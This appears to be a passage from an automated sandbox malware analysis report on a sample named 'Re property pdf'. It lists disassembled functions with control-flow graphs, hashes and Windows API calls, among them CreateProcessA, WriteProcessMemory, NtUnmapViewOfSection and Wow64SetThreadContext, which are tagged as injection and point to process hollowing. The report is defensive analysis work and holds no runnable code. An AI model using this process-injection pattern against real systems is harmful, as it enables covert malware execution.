                                                                                                                              • Instruction ID: fcd25eabe9e2b6234568d86392345da2afc1ec6e9019478de3f1c9f8efc83760
                                                                                                                              • Opcode Fuzzy Hash: 98af118ae57d7d6c63fd98d2c6ccb653df2c2fd85f262ff6b23be8bb706e3108
                                                                                                                              • Instruction Fuzzy Hash: 431167B59003498ECB20CFAAC445BEEFFF5AB88324F248419D419A7210C775A945DB95
                                                                                                                              Function 07724C88 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 07724CED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 498011366-0
                                                                                                                              • Opcode ID: f02753112ec2f0f2d43032e0b140efa73016e3ef1a632e291ab835ab1d35610e
                                                                                                                              • Instruction ID: 3062fc52f2fa90a1d968a7e6eafc1ffcbd9899c97255c12d7a911eadf9cf63d3
                                                                                                                              • Opcode Fuzzy Hash: f02753112ec2f0f2d43032e0b140efa73016e3ef1a632e291ab835ab1d35610e
                                                                                                                              • Instruction Fuzzy Hash: 741158B19003498FCB20DFAAC445BEEFFF5EF88320F24841AD519A7240CB75A944DBA0
                                                                                                                              Function 052FDB98 Relevance: .2, Instructions: 185COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1cf7be2791b133629c4862d613e5cfe9a1ba41e4bdf2bcd8ca66649e33c32a36
                                                                                                                              • Instruction ID: ab7256de574b268787125cbc5925e454866128a914e2f7374427a5592b6e3f39
                                                                                                                              • Opcode Fuzzy Hash: 1cf7be2791b133629c4862d613e5cfe9a1ba41e4bdf2bcd8ca66649e33c32a36
                                                                                                                              • Instruction Fuzzy Hash: D2614771A143469FDB06DF79D9906AEFFF2BF89300B04846AD549DB352EB349900CBA1
                                                                                                                              Function 07724760 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 552 7724760-7724778 555 772477a-7724789 552->555 556 77247ef 552->556 557 7724754-772475b 555->557 558 772478b-7724793 555->558 559 77291d0-772923a PostMessageW 556->559 557->559 558->556 561 7729243-7729257 559->561 562 772923c-7729242 559->562 562->561
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0772922D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID: Ak^
                                                                                                                              • API String ID: 410705778-2227433594
                                                                                                                              • Opcode ID: 6210103e5195d5992df445a214d89cb3b991f244a9c8871a69915f20bcf3dba6
                                                                                                                              • Instruction ID: 87030d7179c47b0fbcbdfeca782d8ab6d6ea334b707710daa0977c386807141a
                                                                                                                              • Opcode Fuzzy Hash: 6210103e5195d5992df445a214d89cb3b991f244a9c8871a69915f20bcf3dba6
                                                                                                                              • Instruction Fuzzy Hash: 73218EB18083988FD711DF99C444BDEBFF4EF0A314F15449AD554BB212D374A848DBA2
                                                                                                                              Function 07724D34 Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1631 7724d34-7724d36 1632 7724d38-7724d3d 1631->1632 1633 7724d3f-7724dd5 1631->1633 1632->1633 1634 7724d08-7724d28 1632->1634 1636 7724dd7-7724de1 1633->1636 1637 7724e0e-7724e2e 1633->1637 1636->1637 1639 7724de3-7724de5 1636->1639 1643 7724e30-7724e3a 1637->1643 1644 7724e67-7724e96 1637->1644 1641 7724de7-7724df1 1639->1641 1642 7724e08-7724e0b 1639->1642 1646 7724df3 1641->1646 1647 7724df5-7724e04 1641->1647 1642->1637 1643->1644 1648 7724e3c-7724e3e 1643->1648 1655 7724e98-7724ea2 1644->1655 1656 7724ecf-7724f89 CreateProcessA 1644->1656 1646->1647 1647->1647 1649 7724e06 1647->1649 1650 7724e40-7724e4a 1648->1650 1651 7724e61-7724e64 1648->1651 1649->1642 1653 7724e4e-7724e5d 1650->1653 1654 7724e4c 1650->1654 1651->1644 1653->1653 1657 7724e5f 1653->1657 1654->1653 1655->1656 1658 7724ea4-7724ea6 1655->1658 1667 7724f92-7725018 1656->1667 1668 7724f8b-7724f91 1656->1668 1657->1651 1659 7724ea8-7724eb2 1658->1659 1660 7724ec9-7724ecc 1658->1660 1662 7724eb6-7724ec5 1659->1662 1663 7724eb4 1659->1663 1660->1656 1662->1662 1664 7724ec7 1662->1664 1663->1662 1664->1660 1678 772501a-772501e 1667->1678 1679 7725028-772502c 1667->1679 1668->1667 1678->1679 1680 7725020 1678->1680 1681 772502e-7725032 1679->1681 1682 772503c-7725040 1679->1682 1680->1679 1681->1682 1683 7725034 1681->1683 1684 7725042-7725046 1682->1684 1685 7725050-7725054 1682->1685 1683->1682 1684->1685 1686 7725048 1684->1686 1687 7725066-772506d 1685->1687 1688 7725056-772505c 1685->1688 1686->1685 1689 7725084 1687->1689 1690 772506f-772507e 1687->1690 1688->1687 1692 7725085 1689->1692 1690->1689 1692->1692
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07724F76
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: 96f31633221911abcf1544cb670fdad9a5166ab7352f09d6c086d1b299b68c56
                                                                                                                              • Instruction ID: 08cd81854bd9855ef809d6573601ef48c7c4818100048f2803f6908e15727b64
                                                                                                                              • Opcode Fuzzy Hash: 96f31633221911abcf1544cb670fdad9a5166ab7352f09d6c086d1b299b68c56
                                                                                                                              • Instruction Fuzzy Hash: 14A15BB1D0026ADFDB20CF68CC417ADBBB2BF48354F1485A9D819A7240DB749986DF91
                                                                                                                              Function 07724D40 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1693 7724d40-7724dd5 1695 7724dd7-7724de1 1693->1695 1696 7724e0e-7724e2e 1693->1696 1695->1696 1697 7724de3-7724de5 1695->1697 1701 7724e30-7724e3a 1696->1701 1702 7724e67-7724e96 1696->1702 1699 7724de7-7724df1 1697->1699 1700 7724e08-7724e0b 1697->1700 1703 7724df3 1699->1703 1704 7724df5-7724e04 1699->1704 1700->1696 1701->1702 1705 7724e3c-7724e3e 1701->1705 1712 7724e98-7724ea2 1702->1712 1713 7724ecf-7724f89 CreateProcessA 1702->1713 1703->1704 1704->1704 1706 7724e06 1704->1706 1707 7724e40-7724e4a 1705->1707 1708 7724e61-7724e64 1705->1708 1706->1700 1710 7724e4e-7724e5d 1707->1710 1711 7724e4c 1707->1711 1708->1702 1710->1710 1714 7724e5f 1710->1714 1711->1710 1712->1713 1715 7724ea4-7724ea6 1712->1715 1724 7724f92-7725018 1713->1724 1725 7724f8b-7724f91 1713->1725 1714->1708 1716 7724ea8-7724eb2 1715->1716 1717 7724ec9-7724ecc 1715->1717 1719 7724eb6-7724ec5 1716->1719 1720 7724eb4 1716->1720 1717->1713 1719->1719 1721 7724ec7 1719->1721 1720->1719 1721->1717 1735 772501a-772501e 1724->1735 1736 7725028-772502c 1724->1736 1725->1724 1735->1736 1737 7725020 1735->1737 1738 772502e-7725032 1736->1738 1739 772503c-7725040 1736->1739 1737->1736 1738->1739 1740 7725034 1738->1740 1741 7725042-7725046 1739->1741 1742 7725050-7725054 1739->1742 1740->1739 1741->1742 1743 7725048 1741->1743 1744 7725066-772506d 1742->1744 1745 7725056-772505c 1742->1745 1743->1742 1746 7725084 1744->1746 1747 772506f-772507e 1744->1747 1745->1744 1749 7725085 1746->1749 1747->1746 1749->1749
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07724F76
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: febd59d63b803393dad1dfe94a22e80f8658d5fa83ed359593b04a16a3bbe4a5
                                                                                                                              • Instruction ID: fa93bbba041b2a7f81f20d2b1764647c23868399553f3a7e407044584832238b
                                                                                                                              • Opcode Fuzzy Hash: febd59d63b803393dad1dfe94a22e80f8658d5fa83ed359593b04a16a3bbe4a5
                                                                                                                              • Instruction Fuzzy Hash: F6915CB1D0026ADFEB20CF68CC417ADBBB2BF48354F1485A9D819A7240DB749986DF91
                                                                                                                              Function 0130ADA8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1750 130ada8-130adb7 1751 130ade3-130ade7 1750->1751 1752 130adb9-130adc6 call 130a0cc 1750->1752 1754 130ade9-130adf3 1751->1754 1755 130adfb-130ae3c 1751->1755 1758 130adc8 1752->1758 1759 130addc 1752->1759 1754->1755 1761 130ae49-130ae57 1755->1761 1762 130ae3e-130ae46 1755->1762 1806 130adce call 130b030 1758->1806 1807 130adce call 130b040 1758->1807 1759->1751 1763 130ae59-130ae5e 1761->1763 1764 130ae7b-130ae7d 1761->1764 1762->1761 1766 130ae60-130ae67 call 130a0d8 1763->1766 1767 130ae69 1763->1767 1769 130ae80-130ae87 1764->1769 1765 130add4-130add6 1765->1759 1768 130af18-130afd8 1765->1768 1771 130ae6b-130ae79 1766->1771 1767->1771 1801 130afe0-130b00b GetModuleHandleW 1768->1801 1802 130afda-130afdd 1768->1802 1772 130ae94-130ae9b 1769->1772 1773 130ae89-130ae91 1769->1773 1771->1769 1776 130aea8-130aeaa call 130a0e8 1772->1776 1777 130ae9d-130aea5 1772->1777 1773->1772 1779 130aeaf-130aeb1 1776->1779 1777->1776 1781 130aeb3-130aebb 1779->1781 1782 130aebe-130aec3 1779->1782 1781->1782 1783 130aee1-130aeee 1782->1783 1784 130aec5-130aecc 1782->1784 1791 130aef0-130af0e 1783->1791 1792 130af11-130af17 1783->1792 1784->1783 1786 130aece-130aede call 130a0f8 call 130a108 1784->1786 1786->1783 1791->1792 1803 130b014-130b028 1801->1803 1804 130b00d-130b013 1801->1804 1802->1801 1804->1803 1806->1765 1807->1765
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0130AFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 9fc84cbe56a0c21bd95d421e710d20653117681f3215da305bd7d1f17da4d2b3
                                                                                                                              • Instruction ID: e4c65d8daab8297d3afeea9fa614b39503b4b60ed18f7d1b09cace45a9bd46d4
                                                                                                                              • Opcode Fuzzy Hash: 9fc84cbe56a0c21bd95d421e710d20653117681f3215da305bd7d1f17da4d2b3
                                                                                                                              • Instruction Fuzzy Hash: 6C714670A10B058FD725DF29D46475ABBF5FF88304F008A2DD58AD7A80DB75E849CB91
                                                                                                                              Function 0130590C Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1808 130590c-1305914 1809 13058b1-13058d9 1808->1809 1810 1305916 1808->1810 1813 13058e2-1305903 1809->1813 1814 13058db-13058e1 1809->1814 1812 1305918-13059d9 CreateActCtxA 1810->1812 1816 13059e2-1305a3c 1812->1816 1817 13059db-13059e1 1812->1817 1814->1813 1825 1305a4b-1305a4f 1816->1825 1826 1305a3e-1305a41 1816->1826 1817->1816 1827 1305a60 1825->1827 1828 1305a51-1305a5d 1825->1828 1826->1825 1830 1305a61 1827->1830 1828->1827 1830->1830
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 1221fc22eb61a8c1b91543cf4e6ff707ade870ee9e7f23cf18660cb016025403
                                                                                                                              • Instruction ID: b7124ab7e75d07c0f7f4afda5b0dd3219502550f3474ef31ee1612dbaf2dcd94
                                                                                                                              • Opcode Fuzzy Hash: 1221fc22eb61a8c1b91543cf4e6ff707ade870ee9e7f23cf18660cb016025403
                                                                                                                              • Instruction Fuzzy Hash: 7F5103B1C00319CFDB25CFA9C984BDEBBF5AF48318F20805AD408AB251D7756949CF50
                                                                                                                              Function 052F18E4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1831 52f18e4-52f1956 1833 52f1958-52f195e 1831->1833 1834 52f1961-52f1968 1831->1834 1833->1834 1835 52f196a-52f1970 1834->1835 1836 52f1973-52f1a12 CreateWindowExW 1834->1836 1835->1836 1838 52f1a1b-52f1a53 1836->1838 1839 52f1a14-52f1a1a 1836->1839 1843 52f1a55-52f1a58 1838->1843 1844 52f1a60 1838->1844 1839->1838 1843->1844 1845 52f1a61 1844->1845 1845->1845
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052F1A02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 1ce9a11e98c331dff42670480f4751d22dd0a22c62436f0742fe7302bea7b1ba
                                                                                                                              • Instruction ID: c5cebb920c957ee040a73aa1e75a72c05ec01ce9d4ca4c19c512c22049283de2
                                                                                                                              • Opcode Fuzzy Hash: 1ce9a11e98c331dff42670480f4751d22dd0a22c62436f0742fe7302bea7b1ba
                                                                                                                              • Instruction Fuzzy Hash: 1751EFB1D10349DFDB14CF99C984ADEFBB6BF48310F64812AE819AB210D7B0A845CF90
                                                                                                                              Function 052F18F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1846 52f18f0-52f1956 1847 52f1958-52f195e 1846->1847 1848 52f1961-52f1968 1846->1848 1847->1848 1849 52f196a-52f1970 1848->1849 1850 52f1973-52f1a12 CreateWindowExW 1848->1850 1849->1850 1852 52f1a1b-52f1a53 1850->1852 1853 52f1a14-52f1a1a 1850->1853 1857 52f1a55-52f1a58 1852->1857 1858 52f1a60 1852->1858 1853->1852 1857->1858 1859 52f1a61 1858->1859 1859->1859
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052F1A02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 10a1e8eac4ecd471a5c9b3b2d42244a7858d18338b468b819580c70c3c789371
                                                                                                                              • Instruction ID: b0795a804b38612c68a2376a9fdd6baaab01e2be86a1bf43662216658092c201
                                                                                                                              • Opcode Fuzzy Hash: 10a1e8eac4ecd471a5c9b3b2d42244a7858d18338b468b819580c70c3c789371
                                                                                                                              • Instruction Fuzzy Hash: D841EFB1D10349DFDB14CF9AD984ADEFBB5BF48310F64812AE919AB210D7B0A845CF90
                                                                                                                              Function 013044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 7cea3dcfc42895accd2d9703eca1f456bf13c53dfc301db292d7d24c7fdcef56
                                                                                                                              • Instruction ID: 9d5cce5c84b0b6c287d869b267794c12013037df4cf1b9f3d27346354f96a7b7
                                                                                                                              • Opcode Fuzzy Hash: 7cea3dcfc42895accd2d9703eca1f456bf13c53dfc301db292d7d24c7fdcef56
                                                                                                                              • Instruction Fuzzy Hash: A941CFB0C0071DCBDB25CFA9C984B9EBBF5BF49308F60806AD508AB255DB756945CF90
                                                                                                                              Function 052F4040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 052F4101
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 60739c7c3f411dea69f776de1d5ff127c69dbfff5f3bdcd3440b41cf8e715cbc
                                                                                                                              • Instruction ID: 1afa3c057108792ad1071c0d446f4e054a72b692d5d044cfcd8a114785cc3742
                                                                                                                              • Opcode Fuzzy Hash: 60739c7c3f411dea69f776de1d5ff127c69dbfff5f3bdcd3440b41cf8e715cbc
                                                                                                                              • Instruction Fuzzy Hash: 694126B4910209CFDB14DF99C848AABFBF6FF98314F248499D519A7321D7B5A841CFA0
                                                                                                                              Function 07724510 Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07724596
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              • Opcode ID: 9e7ae25645eac61fcefd3f839221e251d98e53d1e4a7affb7fb57e0edbd65f51
                                                                                                                              • Instruction ID: 5a1575b578112178966c42d1c852afd4095410078b9d8c79942f817ac8b2a44d
                                                                                                                              • Opcode Fuzzy Hash: 9e7ae25645eac61fcefd3f839221e251d98e53d1e4a7affb7fb57e0edbd65f51
                                                                                                                              • Instruction Fuzzy Hash: 48315AB5E002598FCB10CFAAC4857EEBBF4EF88364F14842AD469A7240C7789946DF94
                                                                                                                              Function 07724AB0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07724B48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: 404f4fbac31d5dff83d287e4cb8c022f761642e15c884b78b1a52c86d279a3b8
                                                                                                                              • Instruction ID: db878eab9ac3ac523ae3238581ed273b2ac5b90daf12afa5dd4432adc1bd7a21
                                                                                                                              • Opcode Fuzzy Hash: 404f4fbac31d5dff83d287e4cb8c022f761642e15c884b78b1a52c86d279a3b8
                                                                                                                              • Instruction Fuzzy Hash: B2215AB59003599FCB10CFA9C981BEEBBF5FF48320F148429E969A7240C7789941DB64
                                                                                                                              Function 07724AB8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07724B48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: b1db6a748f3b46e688ba72af262ad8630c98c44adc5b066bc668960eb7b82f8b
                                                                                                                              • Instruction ID: fbb3c95870877b95d43ab81f6341e7900ffcb83cf01b65a861ec962dfbab4da6
                                                                                                                              • Opcode Fuzzy Hash: b1db6a748f3b46e688ba72af262ad8630c98c44adc5b066bc668960eb7b82f8b
                                                                                                                              • Instruction Fuzzy Hash: 0E2139B59003599FCB10CFA9C985BEEBBF5FF48320F10842AE919A7240C7789945DBA0
                                                                                                                              Function 07724BA1 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07724C28
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: 443018013ebab128fe7ce73ad55547c4fea884c76956428bf17e85e4988460c3
                                                                                                                              • Instruction ID: 12701bd28b1fde304bab3374d6e07b5d909059bc9b4839f73192082753b2ecc8
                                                                                                                              • Opcode Fuzzy Hash: 443018013ebab128fe7ce73ad55547c4fea884c76956428bf17e85e4988460c3
                                                                                                                              • Instruction Fuzzy Hash: 5B2169B1C003599FDB10CFA9C881AEEBFF5FF48320F10882AE529A7250C7789945DB61
                                                                                                                              Function 0130D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0130D656,?,?,?,?,?), ref: 0130D717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: 4e8d65640f04877f2261dbeec5ba3989aa9132a10b207ba7a708213398da4e1d
                                                                                                                              • Instruction ID: 420eace88cbcc3397c9ec6a5ed2bf98f7f66a7c3aa522df6eb30bbd66b4df345
                                                                                                                              • Opcode Fuzzy Hash: 4e8d65640f04877f2261dbeec5ba3989aa9132a10b207ba7a708213398da4e1d
                                                                                                                              • Instruction Fuzzy Hash: D621E5B59002489FDB10CF9AD984AEEFFF8EB48324F14845AE918A7350D374A954CFA4
                                                                                                                              Function 07724518 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07724596
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              • Opcode ID: 7bce00c3255d06ecb3038d602cd9d8d1b15a80b5ee263ed7c51fe47a8fc9f3ce
                                                                                                                              • Instruction ID: 5917bf4902650f045ad9d7ece44d75cfa072d6b94438ad05f6a730ba9b6af8fc
                                                                                                                              • Opcode Fuzzy Hash: 7bce00c3255d06ecb3038d602cd9d8d1b15a80b5ee263ed7c51fe47a8fc9f3ce
                                                                                                                              • Instruction Fuzzy Hash: FB2149B1D003198FDB10DFAAC4857EEBBF4EF48320F14842AD559A7240C7789945DFA1
                                                                                                                              Function 07724BA8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07724C28
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: a76049c16323845ba099827676614e6e3719c5b9d2b5d9c550fd387365a33642
                                                                                                                              • Instruction ID: 1df28fb7a4159ae715ad24a1de4c04021479211a6dd5c10278729d46b19201cb
                                                                                                                              • Opcode Fuzzy Hash: a76049c16323845ba099827676614e6e3719c5b9d2b5d9c550fd387365a33642
                                                                                                                              • Instruction Fuzzy Hash: E52139B1D003599FDB10DFAAC981AEEFBF5FF48320F10842AE518A7250C7799941DBA1
                                                                                                                              Function 0130D689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
